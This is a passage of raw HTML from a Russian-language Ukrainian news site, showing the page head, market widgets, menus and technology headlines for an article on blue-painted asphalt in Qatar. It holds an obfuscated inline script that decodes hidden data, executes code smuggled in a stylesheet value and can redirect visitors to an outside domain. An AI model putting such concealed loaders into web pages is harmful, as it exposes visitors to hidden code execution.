<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>В Катаре асфальт перекрашивают в синий цвет | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="В Катаре асфальт перекрашивают в синий цвет "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2019/08/630_360_1566113819-897.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="263" /><meta property="og:image:alt" content="В Катаре асфальт перекрашивают в синий цвет " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><meta name="description" content="В столице Катара одну из автодорог перекрасили в синий цвет. Дорожники пошли на такой шаг для того, чтобы уменьшить температуру нагрева асфальта." /><meta property="og:description" content="В столице Катара одну из автодорог перекрасили в синий цвет. Дорожники пошли на такой шаг для того, чтобы уменьшить температуру нагрева асфальта." /><meta name="keywords" content="асфальт,катар,новости технологий" /><link rel="canonical" href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" /><meta property="og:url" content="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4769418';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/mainstyle.css" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4769418&amp;a=9750" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:3px"> <div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/news_technology-ukr/full/1808-u-katari-asfalt-perefarbovuyut-v-sinij-kolir">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>25.35</td><td>25.05</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>28.32</td><td>27.70</td><td>27.85</td> </tr> <tr><td>RUB</td><td>0.40</td><td>0.31</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>535.22</td><td>0.00</td><td>17:49 16.08.2019</td> </tr> <tr class="tr_white"> <td>UX</td><td>1582.94</td><td>0.00</td><td>17:00 16.08.19</td> </tr> <tr> <td>RTS</td><td>1239.81</td><td>0.00</td><td>18:50 16.08.2019</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>58.64</td><td>0.00</td><td style="text-transform:uppercase;">Aug</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li id="menu-item-1" ><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li></ul></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><div class="wiget simple_pr"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="blogTitle"><p style="font-size:8pt;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=476&pid=10660" rel="bookmark">Royal Photographic Society 2019: лучшие работы с конкурса научной фотографии</a></p><div style="text-align:center;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=476&pid=10660" rel="bookmark"> <img alt="Фото недели" src="https://enovosty.com/wp-content/gallery/royal/thumbs/thumbs_01.jpg"></a></div></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости технологий</p></div><div class='cls'></div><span class='news_date'>18.08.2019 г.</span><br /><div class="post_news"><span id="post-4769432"><span class="postDate">16:42</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1808-spacex-i-nasa-proveli-zrelishhnuyu-sovmestnuyu-trenirovku-foto">SpaceX и NASA провели зрелищную совместную тренировку (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4769418"><span class="postDate">14:21</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1808-v-katare-asfalt-perekrashivayut-v-sinij-cvet">В Катаре асфальт перекрашивают в синий цвет</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4769394"><span class="postDate">10:19</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1808-eksperty-smodelirovali-posledstviya-yadernoj-vojny-mezhdu-ssha-i-rossiej">Эксперты смоделировали последствия ядерной войны между США и Россией</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4769380"><span class="postDate">09:33</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1808-oon-izmenenie-klimata-mozhet-vyzvat-medlennyj-globalnyj-prodovolstvennyj-krizis">ООН: Изменение климата может вызвать медленный глобальный продовольственный кризис</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>17.08.2019 г.</span><br /><div class="post_news"><span 